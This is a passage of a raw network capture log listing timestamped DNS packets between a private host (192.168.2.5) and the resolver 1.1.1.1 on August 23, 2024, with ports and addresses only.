Aug 23, 2024 18:43:31.963998079 CEST	53	54781	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.964389086 CEST	53	59634	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.964432955 CEST	53	54585	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.964442968 CEST	53	52602	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.964596033 CEST	53	50242	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.965202093 CEST	53	55670	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.966108084 CEST	53	52598	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.967344046 CEST	53	53987	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.968674898 CEST	53	56344	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.970987082 CEST	53	57167	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.971400023 CEST	53	60091	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.972338915 CEST	53	62827	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.973454952 CEST	53	61671	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.974967003 CEST	53	61412	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.975922108 CEST	53	53079	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.976151943 CEST	53	65388	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.978234053 CEST	53	56053	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.979398966 CEST	53	56618	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.984822035 CEST	53	49806	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.984858036 CEST	53	55622	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.984983921 CEST	53	61316	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.985738039 CEST	53	57422	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.985748053 CEST	53	50476	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.986140966 CEST	53	55577	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.987196922 CEST	53	62836	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.512087107 CEST	61307	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.512088060 CEST	62846	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.512742043 CEST	63226	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.513360023 CEST	62126	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.513360023 CEST	60886	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.513894081 CEST	60604	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.514146090 CEST	64415	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.514575958 CEST	63751	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.514642000 CEST	59516	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.514766932 CEST	60488	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.515295982 CEST	63246	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.515295982 CEST	52184	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.515770912 CEST	49207	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.516011953 CEST	54433	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.516011953 CEST	49492	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.516577005 CEST	50585	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.516957998 CEST	49658	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.517399073 CEST	56078	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.518029928 CEST	64830	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.518757105 CEST	62095	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.519401073 CEST	50295	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.520026922 CEST	61568	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.520622969 CEST	57363	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.521173954 CEST	63727	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.521954060 CEST	49931	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.522598982 CEST	53765	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.522715092 CEST	53	63226	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.522967100 CEST	53	62846	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.523848057 CEST	53	60604	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.523875952 CEST	52420	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.524007082 CEST	53	60886	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.524312973 CEST	56637	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.525108099 CEST	53	52184	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.525228977 CEST	53	63246	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.525363922 CEST	53	61307	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.525686979 CEST	53	59516	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.526022911 CEST	53	63751	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.526711941 CEST	53	49207	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.526758909 CEST	53	49492	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.527580023 CEST	53	60488	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.528636932 CEST	53	64830	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.529427052 CEST	53	54433	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.529666901 CEST	50729	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.529666901 CEST	62514	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.529869080 CEST	53	62095	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.530155897 CEST	63275	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.530155897 CEST	58954	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.530368090 CEST	65105	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.530539989 CEST	50857	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.530728102 CEST	62496	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.530837059 CEST	53	50295	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.530853033 CEST	53	61568	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.531352997 CEST	62799	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.531584978 CEST	57853	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.531903982 CEST	50918	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.532140970 CEST	52855	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.532356977 CEST	63449	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.532783985 CEST	53	63727	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.532792091 CEST	64548	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.533226013 CEST	53	53765	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.533258915 CEST	52103	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.533663988 CEST	50689	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.533889055 CEST	56809	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.534279108 CEST	60928	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.534482002 CEST	50011	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.534679890 CEST	53	56637	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.534708977 CEST	50153	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.535052061 CEST	50101	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.535295010 CEST	57776	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.535517931 CEST	53	52420	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.536390066 CEST	63057	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.536633015 CEST	59842	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.540582895 CEST	53	65105	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.540853977 CEST	53	50857	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.541129112 CEST	53	50729	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.541358948 CEST	53	62514	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.541668892 CEST	53	58954	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.541719913 CEST	53	62799	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.542574883 CEST	58350	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.542984962 CEST	53	52103	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.543075085 CEST	53	57853	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.543354988 CEST	53	63449	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.543456078 CEST	53	52855	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.543760061 CEST	54530	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.543957949 CEST	58523	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.544258118 CEST	49803	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.544414043 CEST	53	64548	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.544442892 CEST	55740	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.544913054 CEST	50540	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.544913054 CEST	49205	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.545084953 CEST	56225	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.545237064 CEST	59826	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.545243979 CEST	53	50153	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.545274973 CEST	53	56809	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.545444965 CEST	53	50011	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.545720100 CEST	62387	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.545720100 CEST	58926	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.545820951 CEST	58256	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.545932055 CEST	52658	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:32.546307087 CEST	53	62126	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.546317101 CEST	53	50101	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.546325922 CEST	53	57776	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.547663927 CEST	53	63057	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.548702002 CEST	53	50585	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.548712015 CEST	53	49658	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.550643921 CEST	53	64415	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.553472996 CEST	53	56078	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.554867029 CEST	53	54530	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.554944992 CEST	53	58523	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.555077076 CEST	53	50540	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.555299997 CEST	53	49803	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.555427074 CEST	53	49205	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.555839062 CEST	53	58256	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.555960894 CEST	53	59826	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.556899071 CEST	53	56225	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.557852030 CEST	53	49931	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.561000109 CEST	53	63275	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.561672926 CEST	53	62496	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.563028097 CEST	53	50918	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.566848040 CEST	53	60928	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.568636894 CEST	53	59842	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.574007988 CEST	53	58350	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.575790882 CEST	53	55740	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.576781988 CEST	53	52658	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.576791048 CEST	53	58926	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.580720901 CEST	53	62387	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.682169914 CEST	53	57363	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.734181881 CEST	53	50689	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:32.748999119 CEST	65301	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.026772022 CEST	53	65301	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.525532007 CEST	49936	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.525532007 CEST	65471	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.526129007 CEST	51280	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.526165009 CEST	59307	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.526695013 CEST	53156	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.526770115 CEST	64877	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.527434111 CEST	62877	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.528006077 CEST	55256	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.528265953 CEST	63764	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.528378010 CEST	58581	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.529031038 CEST	60704	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.529052019 CEST	51998	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.529628992 CEST	51404	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.530230999 CEST	52737	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.530617952 CEST	65078	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.530909061 CEST	60096	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.531603098 CEST	59285	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.532237053 CEST	53274	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.534360886 CEST	61943	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.535377026 CEST	60892	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.536557913 CEST	60266	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.537482977 CEST	51918	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.538000107 CEST	53	65471	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.538381100 CEST	53	64877	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.538691998 CEST	53	62877	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.538773060 CEST	59334	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.538836002 CEST	53	49936	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.539619923 CEST	53	55256	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.539640903 CEST	53	60704	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.540436983 CEST	53	51998	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.542385101 CEST	53	51404	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.542989969 CEST	53	53274	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.549762964 CEST	60931	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.550070047 CEST	59919	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.550465107 CEST	54785	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.550937891 CEST	60708	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.551861048 CEST	63917	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.553795099 CEST	53	52737	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.553806067 CEST	53	60096	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.553814888 CEST	53	61943	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.554498911 CEST	53	65078	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.558800936 CEST	57557	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.559331894 CEST	62270	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.559604883 CEST	50909	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.560400009 CEST	52811	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.560812950 CEST	51375	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.561085939 CEST	54338	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.561315060 CEST	57684	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.561500072 CEST	50610	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.561631918 CEST	59368	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.561790943 CEST	58299	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.561942101 CEST	62001	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.562103033 CEST	54862	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.562228918 CEST	58884	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.562372923 CEST	50291	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.562500954 CEST	59036	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.562625885 CEST	51962	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.562760115 CEST	50299	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.562890053 CEST	63757	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.563030005 CEST	56665	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.563182116 CEST	57238	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.563327074 CEST	55100	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.563500881 CEST	61034	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.564357996 CEST	53	60266	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.564421892 CEST	53	53156	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.564475060 CEST	53	59307	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.564490080 CEST	53	51280	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.564526081 CEST	53	58581	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.564536095 CEST	53	63764	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.564707994 CEST	59727	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.565737009 CEST	64293	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.565968037 CEST	53	59285	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.565999985 CEST	50319	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.566271067 CEST	62649	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.566334009 CEST	60327	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.566603899 CEST	51951	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.567086935 CEST	65188	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.567320108 CEST	53927	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.567363977 CEST	54798	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.567663908 CEST	62632	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.567799091 CEST	54005	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.567982912 CEST	53755	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.568130016 CEST	63818	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.568229914 CEST	65391	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.569936037 CEST	53	54785	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.569946051 CEST	53	60708	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.569953918 CEST	53	59919	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.569962978 CEST	53	63917	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.569983006 CEST	53	59334	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.570506096 CEST	53	60931	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.570518017 CEST	53	60892	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.570910931 CEST	53	51918	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.571723938 CEST	53	50909	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.571980000 CEST	53	57557	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.572112083 CEST	53	51375	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.572756052 CEST	53	62270	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.572808027 CEST	53	50610	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.572999954 CEST	53	52811	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.573419094 CEST	53	54338	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.574075937 CEST	53	56665	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.574671984 CEST	53	58884	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.576555967 CEST	53	51962	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.576572895 CEST	53	50299	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.576625109 CEST	53	62001	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.576652050 CEST	53	55100	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.576661110 CEST	53	57238	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.576674938 CEST	53	50291	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.576684952 CEST	53	60327	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.576723099 CEST	53	50319	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.576948881 CEST	53	51951	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.577008963 CEST	53	62649	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.579365969 CEST	53	64293	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.582784891 CEST	53	65188	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.582793951 CEST	53	54005	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.582803965 CEST	53	53927	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.583049059 CEST	53	53755	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.583339930 CEST	53	63818	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.594250917 CEST	53	57684	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.595762968 CEST	53	54862	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.595772028 CEST	53	58299	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.595781088 CEST	53	59036	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.595814943 CEST	53	61034	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.599255085 CEST	53	59727	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.599263906 CEST	53	59368	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.604123116 CEST	53	62632	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.604459047 CEST	53	65391	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.609288931 CEST	53	54798	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.729681969 CEST	53	63757	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.730947971 CEST	56977	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.731538057 CEST	56276	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.732203007 CEST	58536	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.732827902 CEST	53670	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.733136892 CEST	50963	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.733669996 CEST	56567	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.734002113 CEST	51338	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.734019995 CEST	51663	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.734651089 CEST	60812	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.734668970 CEST	50090	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.735137939 CEST	51709	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.735492945 CEST	56068	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.735975981 CEST	60441	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.736438990 CEST	54531	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.736742020 CEST	61392	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.736855030 CEST	53801	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.737236977 CEST	59105	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.737612009 CEST	56800	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.737840891 CEST	52262	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.739444017 CEST	62541	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.740695953 CEST	57304	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.740729094 CEST	52875	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.740911961 CEST	61713	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.741036892 CEST	55142	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.741274118 CEST	59731	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.741313934 CEST	49563	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.741441965 CEST	55045	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.741647005 CEST	49952	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.741796970 CEST	51492	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.741803885 CEST	51100	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.741807938 CEST	53	56977	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.742063046 CEST	50683	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.742074013 CEST	58039	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.742259026 CEST	49530	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.742475986 CEST	49520	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.742521048 CEST	53566	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.742672920 CEST	54953	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.742866993 CEST	61701	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.742877960 CEST	53	56276	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.742971897 CEST	55489	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.743128061 CEST	53	53670	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.743383884 CEST	61971	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.743555069 CEST	52065	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.743732929 CEST	59900	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.743833065 CEST	52055	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.744107962 CEST	58346	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.744282961 CEST	61106	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.744391918 CEST	53049	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:33.744410992 CEST	53	56567	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:33.744421005 CEST	53	51338	1.1.1.1	192.168.2.5
